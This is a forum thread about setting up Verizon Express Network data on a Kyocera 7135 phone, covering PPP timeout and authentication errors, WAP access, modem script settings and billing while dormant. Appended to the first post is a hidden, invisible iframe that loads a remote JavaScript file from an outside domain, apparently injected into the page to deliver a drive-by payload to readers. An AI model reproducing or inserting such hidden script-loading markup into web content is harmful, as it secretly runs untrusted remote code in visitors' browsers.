+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    I-300 Novice
    Join Date
    04-12-2002
    Location
    Grosse Pointe Woods (Detroit), Michigan
    Posts
    210
    Great info, Alan.

    I followed your instructions and get a 'ErrorPP timeout (0x1231)' message, with the phone emiting a fast busy tone that i have to press the 'red' phone button to get rid of.

    In the password box, it originally reads 'assigned'. When I input the 'vzw' and press ok, it still comes back with the 'assigned' in the box. Is there something I am doing wrong?

    Any suggestions?

    Thanks for all your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

  2. #2
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by PHCismail
    Great info, Alan.

    I followed your instructions and get a 'ErrorPP timeout (0x1231)' message, with the phone emiting a fast busy tone that i have to press the 'red' phone button to get rid of.

    In the password box, it originally reads' 'assigned'. When I input the 'vzw' and press ok, it still comes back with the 'assigned' in the boz. Is there something I am doing wrong?

    Any suggestions?

    Thanks for all your help.
    Assigned is correct. It sounds like Verizon did not correctly set up your account for Express Network. When I signed up, they forgot to turn "Data" on in my account and I had the same symptoms. PPP timeout error and fast busy.

    Alan

  3. #3
    Registered User
    Join Date
    10-03-2002
    Posts
    201
    Alan,

    I talked with the VZW express folks for a while and could not get WAP going. The rep stayed on the line along enough to disable Express Network and then it worked. Then she enabled it, and it did not work.

    I have used the web browsers that came with the phone – they are good show off geek things, but they are not that useful. The EIS browser can show any page, but it is too slow to be useful.

    I would be more satisfied if WAP worked.

    We probably need to wait for the official Verizon release.

    The form factor is great with this phone, but it certainly has a few problems still with Verizon.

    Glenn

  4. #4
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by glenn_butler
    Alan,

    I talked with the VZW express folks for a while and could not get WAP going. The rep stayed on the line along enough to disable Express Network and then it worked. Then she enabled it, and it did not work.

    I have used the web browsers that came with the phone – they are good show off geek things, but they are not that useful. The EIS browser can show any page, but it is too slow to be useful.

    I would be more satisfied if WAP worked.

    We probably need to wait for the official Verizon release.

    The form factor is great with this phone, but it certainly has a few problems still with Verizon.

    Glenn
    I use Blazer for viewing WAP sites on Express Network. Haven't found any that don't work yet....

    Alan

  5. #5
    Registered User
    Join Date
    01-02-2003
    Posts
    40

    Using Express for PC modem

    I need some help here - I was able to load the USB modem driver to my Win98 Laptop; I can get the phone into data, next call mode from the 7135; place it in the cradle; turn off Hotsync; PC recognizes the USB modem; but the send button does not work.

    How do I get the call initiated? Do I need to do it from my laptop? Am I missing something here?

  6. #6
    Registered User
    Join Date
    01-07-2003
    Posts
    34

    Variation to Script?

    When I called Verizon customer service to setup the express network, the tech was helpful, and had dealt with a few 7135's already. He had been able to get all, including mine, to work except for one where he couldn't figure out what was going on. He, of course, stated he couldn't guarantee anything yet because Verizon wasn't supporting the phone yet.

    On the script he had me do something a little different, however. For the second script line, he had me enter:
    at$qnqnc=1
    instead of:
    at$qnqnc=0

    I am not sure what this means. When I connect with one of the browsers (Eudora or EIS) or with the AOL app, I get a connection that states on the phone screen "Packet Data/High Data Rate",
    and on the caller id screen "Data Call". I am assuming this is indicating I am on the high speed data network.

    One question - When the phone scrre shows "Packet Data/Dormant", am I still incurring minute by minute airtime charges?

    Thanks.
    Mike Aymar

  7. #7
    Registered User
    Join Date
    07-14-2002
    Posts
    330
    Packet Data is the high speed service.

    I've tried using both a 1 and a 0 in that script, and I don't see any noticeable difference.

    I believe there is another thread where someone said that you do get charged during dormant mode.

  8. #8
    Registered User
    Join Date
    07-02-2003
    Posts
    46

    Re: Variation to Script?

    Originally posted by MikeA
    When I called Verizon customer service to setup the express network, the tech was helpful, and had dealt with a few 7135's already. He had been able to get all, including mine, to work except for one where he couldn't figure out what was going on. He, of course, stated he couldn't guarantee anything yet because Verizon wasn't supporting the phone yet.

    On the script he had me do something a little different, however. For the second script line, he had me enter:
    at$qnqnc=1
    instead of:
    at$qnqnc=0

    I am not sure what this means. When I connect with one of the browsers (Eudora or EIS) or with the AOL app, I get a connection that states on the phone screen "Packet Data/High Data Rate",
    and on the caller id screen "Data Call". I am assuming this is indicating I am on the high speed data network.

    One question - When the phone scrre shows "Packet Data/Dormant", am I still incurring minute by minute airtime charges?

    Thanks.
    Mike Aymar
    I get this same message, but I don't have EN. Alanb seems to think that my phone could be fooling itself into thinking that it's on the High speed network, even when i'm not. It'll be interesting to see what happens on my bill this month.....

  9. #9
    Registered User
    Join Date
    12-16-2002
    Posts
    171
    Help please! I know I have data on my plan with VZW as I have been using the QNC Service connection and surfing with good success (albeit a little slow). I just tried setting up the 3G data connection and I get "Error: authentication failure (0x1233)".

    Can you have data but not access to the 3G or am I doing something dumb?

  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Very well done Alan... I just wish I was in a position to need your instructions

    Maybe someday....
    Please visit my picture site: Robert-O-Rama :)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts